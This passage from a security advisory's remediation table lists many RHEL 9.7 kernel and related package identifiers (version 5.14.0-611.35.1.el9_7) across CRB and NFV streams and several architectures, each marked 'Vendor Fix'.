| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
